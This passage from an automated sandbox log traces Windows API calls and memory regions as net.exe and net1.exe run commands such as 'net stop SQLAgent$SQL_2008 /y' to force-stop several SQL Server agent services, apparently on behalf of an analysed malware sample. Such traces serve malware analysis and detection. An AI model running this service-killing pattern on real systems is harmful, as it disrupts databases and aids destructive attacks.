_wcsicmp (_String1="prdr", _String2="SQLAGENT$SHAREPOINT") returned -3 [0111.607] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$SHAREPOINT") returned -15 [0111.607] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$SHAREPOINT") returned -7 [0111.607] _wcsicmp (_String1="server", _String2="SQLAGENT$SHAREPOINT") returned -12 [0111.607] _wcsicmp (_String1="svr", _String2="SQLAGENT$SHAREPOINT") returned 5 [0111.607] _wcsicmp (_String1="srv", _String2="SQLAGENT$SHAREPOINT") returned 1 [0111.607] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$SHAREPOINT") returned -7 [0111.607] _wcsicmp (_String1="alerter", _String2="SQLAGENT$SHAREPOINT") returned -18 [0111.607] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$SHAREPOINT") returned -5 [0111.607] NetServiceControl (in: servername=0x0, service="SQLAGENT$SHAREPOINT", opcode=0x0, arg=0x0, bufptr=0x16f9d0 | out: bufptr=0x16f9d0) returned 0x889 [0111.608] wcscpy_s (in: _Destination=0xff7280d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0111.608] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0111.609] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0111.611] GetFileType (hFile=0xb) returned 0x2 [0111.611] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f898 | out: lpMode=0x16f898) returned 1 [0111.611] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x16f890, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0x16f890*=0x1e) returned 1 [0111.611] GetFileType (hFile=0xb) returned 0x2 [0111.612] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f898 | out: lpMode=0x16f898) returned 1 [0111.612] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f890, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0x16f890*=0x2) returned 1 [0111.612] _ultow (in: _Dest=0x889, _Radix=1505536 | out: _Dest=0x889) returned="2185" [0111.612] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0111.612] GetFileType (hFile=0xb) returned 0x2 [0111.613] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f898 | out: lpMode=0x16f898) returned 1 [0111.613] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x16f890, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0x16f890*=0x34) returned 1 [0111.613] GetFileType (hFile=0xb) returned 0x2 [0111.613] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f898 | out: lpMode=0x16f898) returned 1 [0111.614] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f890, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0x16f890*=0x2) returned 1 [0111.614] NetApiBufferFree (Buffer=0x344d60) returned 0x0 [0111.614] NetApiBufferFree (Buffer=0x34c130) returned 0x0 [0111.614] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SHAREPOINT /y" [0111.614] exit (_Code=2) Process: id = "283" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6a9b7000" os_pid = "0x1140" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10334 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10335 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10336 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10337 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 10338 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10339 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10340 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10341 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10342 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10343 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10344 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 10345 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10346 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 10347 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10348 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 777 os_tid = 0x1178 Process: id = "284" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6b1d6000" os_pid = "0x1084" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10349 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10350 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10351 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10352 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 10353 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10354 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10355 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10356 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10357 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10358 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10359 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 10360 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 10361 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10362 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10363 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 779 os_tid = 0x1120 Process: id = "285" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x59b73000" os_pid = "0x1274" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "279" os_parent_pid = "0x1024" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10364 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10365 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10366 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10367 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 10368 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10369 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10370 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10371 start_va = 0xff700000 end_va = 0xff732fff entry_point = 0xff700000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10372 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10373 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10374 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 10375 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 10376 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 10377 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10378 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10417 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10418 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10419 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10420 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 10421 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 10422 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10423 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10424 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10425 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10426 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10427 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10428 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10429 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10430 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10431 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10432 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10433 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10434 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10435 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10436 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10437 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10438 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10439 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10440 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 781 os_tid = 0x124c [0111.913] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fef0 | out: lpSystemTimeAsFileTime=0x12fef0*(dwLowDateTime=0xf7da2810, dwHighDateTime=0x1d48689)) [0111.913] GetCurrentProcessId () returned 0x1274 [0111.913] GetCurrentThreadId () returned 0x124c [0111.913] GetTickCount () returned 0x25aeb [0111.913] QueryPerformanceCounter (in: lpPerformanceCount=0x12fef8 | out: lpPerformanceCount=0x12fef8*=1815883100000) returned 1 [0111.930] GetModuleHandleW (lpModuleName=0x0) returned 0xff700000 [0111.930] __set_app_type (_Type=0x1) [0111.930] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff719c9c) returned 0x0 [0111.930] __getmainargs (in: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788, _DoWildCard=0, _StartInfo=0xff72479c | out: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788) returned 0 [0111.930] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.930] GetConsoleOutputCP () returned 0x1b5 [0111.930] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff72cec0 | out: lpCPInfo=0xff72cec0) returned 1 [0111.930] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0111.933] sprintf_s (in: _DstBuf=0x12fe98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0111.933] setlocale (category=0, locale=".437") returned="English_United States.437" [0111.934] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.934] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0111.934] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SQL_2008 /y" [0111.934] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fc30, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0111.935] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0111.935] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12fe88 | out: Buffer=0x12fe88*=0x324d60) returned 0x0 [0111.935] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12fe88 | out: Buffer=0x12fe88*=0x32c120) returned 0x0 [0111.935] _fileno (_File=0x7fefdba2a80) returned 0 [0111.935] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0111.935] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0111.935] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0111.935] _wcsicmp (_String1="config", _String2="stop") returned -16 [0111.935] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0111.935] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0111.935] _wcsicmp (_String1="file", _String2="stop") returned -13 [0111.935] _wcsicmp (_String1="files", _String2="stop") returned -13 [0111.935] _wcsicmp (_String1="group", _String2="stop") returned -12 [0111.935] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0111.935] _wcsicmp (_String1="help", _String2="stop") returned -11 [0111.935] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0111.935] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0111.935] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0111.935] _wcsicmp (_String1="session", _String2="stop") returned -15 [0111.936] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0111.936] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0111.936] _wcsicmp (_String1="share", _String2="stop") returned -12 [0111.936] _wcsicmp (_String1="start", _String2="stop") returned -14 [0111.936] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0111.936] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0111.936] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0111.936] _wcsicmp (_String1="accounts", _String2="SQLAgent$SQL_2008") returned -18 [0111.936] _wcsicmp (_String1="computer", _String2="SQLAgent$SQL_2008") returned -16 [0111.936] _wcsicmp (_String1="config", _String2="SQLAgent$SQL_2008") returned -16 [0111.936] _wcsicmp (_String1="continue", _String2="SQLAgent$SQL_2008") returned -16 [0111.936] _wcsicmp (_String1="cont", _String2="SQLAgent$SQL_2008") returned -16 [0111.936] _wcsicmp (_String1="file", _String2="SQLAgent$SQL_2008") returned -13 [0111.936] _wcsicmp (_String1="files", _String2="SQLAgent$SQL_2008") returned -13 [0111.936] _wcsicmp (_String1="group", _String2="SQLAgent$SQL_2008") returned -12 [0111.936] _wcsicmp (_String1="groups", _String2="SQLAgent$SQL_2008") returned -12 [0111.936] _wcsicmp (_String1="help", _String2="SQLAgent$SQL_2008") returned -11 [0111.936] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$SQL_2008") returned -11 [0111.936] _wcsicmp (_String1="localgroup", _String2="SQLAgent$SQL_2008") returned -7 [0111.936] _wcsicmp (_String1="pause", _String2="SQLAgent$SQL_2008") returned -3 [0111.936] _wcsicmp (_String1="session", _String2="SQLAgent$SQL_2008") returned -12 [0111.936] _wcsicmp (_String1="sessions", _String2="SQLAgent$SQL_2008") returned -12 [0111.936] _wcsicmp (_String1="sess", _String2="SQLAgent$SQL_2008") returned -12 [0111.936] _wcsicmp (_String1="share", _String2="SQLAgent$SQL_2008") returned -9 [0111.936] _wcsicmp (_String1="start", _String2="SQLAgent$SQL_2008") returned 3 [0111.936] _wcsicmp (_String1="stats", _String2="SQLAgent$SQL_2008") returned 3 [0111.936] _wcsicmp (_String1="statistics", _String2="SQLAgent$SQL_2008") returned 3 [0111.936] _wcsicmp (_String1="stop", _String2="SQLAgent$SQL_2008") returned 3 [0111.936] _wcsicmp (_String1="time", _String2="SQLAgent$SQL_2008") returned 1 [0111.936] _wcsicmp (_String1="user", _String2="SQLAgent$SQL_2008") returned 2 [0111.936] _wcsicmp (_String1="users", _String2="SQLAgent$SQL_2008") returned 2 [0111.936] _wcsicmp (_String1="msg", _String2="SQLAgent$SQL_2008") returned -6 [0111.936] _wcsicmp (_String1="messenger", _String2="SQLAgent$SQL_2008") returned -6 [0111.937] _wcsicmp (_String1="receiver", _String2="SQLAgent$SQL_2008") returned -1 [0111.937] _wcsicmp (_String1="rcv", _String2="SQLAgent$SQL_2008") returned -1 [0111.937] _wcsicmp (_String1="netpopup", _String2="SQLAgent$SQL_2008") returned -5 [0111.937] _wcsicmp (_String1="redirector", _String2="SQLAgent$SQL_2008") returned -1 [0111.937] _wcsicmp (_String1="redir", _String2="SQLAgent$SQL_2008") returned -1 [0111.937] _wcsicmp (_String1="rdr", _String2="SQLAgent$SQL_2008") returned -1 [0111.937] _wcsicmp (_String1="workstation", _String2="SQLAgent$SQL_2008") returned 4 [0111.937] _wcsicmp (_String1="work", _String2="SQLAgent$SQL_2008") returned 4 [0111.937] _wcsicmp (_String1="wksta", _String2="SQLAgent$SQL_2008") returned 4 [0111.937] _wcsicmp (_String1="prdr", _String2="SQLAgent$SQL_2008") returned -3 [0111.937] _wcsicmp (_String1="devrdr", _String2="SQLAgent$SQL_2008") returned -15 [0111.937] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$SQL_2008") returned -7 [0111.937] _wcsicmp (_String1="server", _String2="SQLAgent$SQL_2008") returned -12 [0111.937] _wcsicmp (_String1="svr", _String2="SQLAgent$SQL_2008") returned 5 [0111.937] _wcsicmp (_String1="srv", _String2="SQLAgent$SQL_2008") returned 1 [0111.937] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$SQL_2008") returned -7 [0111.937] _wcsicmp (_String1="alerter", _String2="SQLAgent$SQL_2008") returned -18 [0111.937] _wcsicmp (_String1="netlogon", _String2="SQLAgent$SQL_2008") returned -5 [0111.937] _wcsupr (in: _String="SQLAgent$SQL_2008" | out: _String="SQLAGENT$SQL_2008") returned="SQLAGENT$SQL_2008" [0111.937] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x32ce30 [0111.941] GetServiceKeyNameW (in: hSCManager=0x32ce30, lpDisplayName="SQLAGENT$SQL_2008", lpServiceName=0xff725750, lpcchBuffer=0x12fda8 | out: lpServiceName="", lpcchBuffer=0x12fda8) returned 0 [0111.943] _wcsicmp (_String1="msg", _String2="SQLAGENT$SQL_2008") returned -6 [0111.943] _wcsicmp (_String1="messenger", _String2="SQLAGENT$SQL_2008") returned -6 [0111.943] _wcsicmp (_String1="receiver", _String2="SQLAGENT$SQL_2008") returned -1 [0111.943] _wcsicmp (_String1="rcv", _String2="SQLAGENT$SQL_2008") returned -1 [0111.943] _wcsicmp (_String1="redirector", _String2="SQLAGENT$SQL_2008") returned -1 [0111.943] _wcsicmp (_String1="redir", _String2="SQLAGENT$SQL_2008") returned -1 [0111.943] _wcsicmp (_String1="rdr", _String2="SQLAGENT$SQL_2008") returned -1 [0111.943] _wcsicmp (_String1="workstation", _String2="SQLAGENT$SQL_2008") returned 4 [0111.943] _wcsicmp (_String1="work", _String2="SQLAGENT$SQL_2008") returned 4 [0111.943] _wcsicmp (_String1="wksta", _String2="SQLAGENT$SQL_2008") returned 4 [0111.943] _wcsicmp (_String1="prdr", _String2="SQLAGENT$SQL_2008") returned -3 [0111.943] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$SQL_2008") returned -15 [0111.943] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$SQL_2008") returned -7 [0111.943] _wcsicmp (_String1="server", _String2="SQLAGENT$SQL_2008") returned -12 [0111.943] _wcsicmp (_String1="svr", _String2="SQLAGENT$SQL_2008") returned 5 [0111.943] _wcsicmp (_String1="srv", _String2="SQLAGENT$SQL_2008") returned 1 [0111.943] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$SQL_2008") returned -7 [0111.943] _wcsicmp (_String1="alerter", _String2="SQLAGENT$SQL_2008") returned -18 [0111.943] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$SQL_2008") 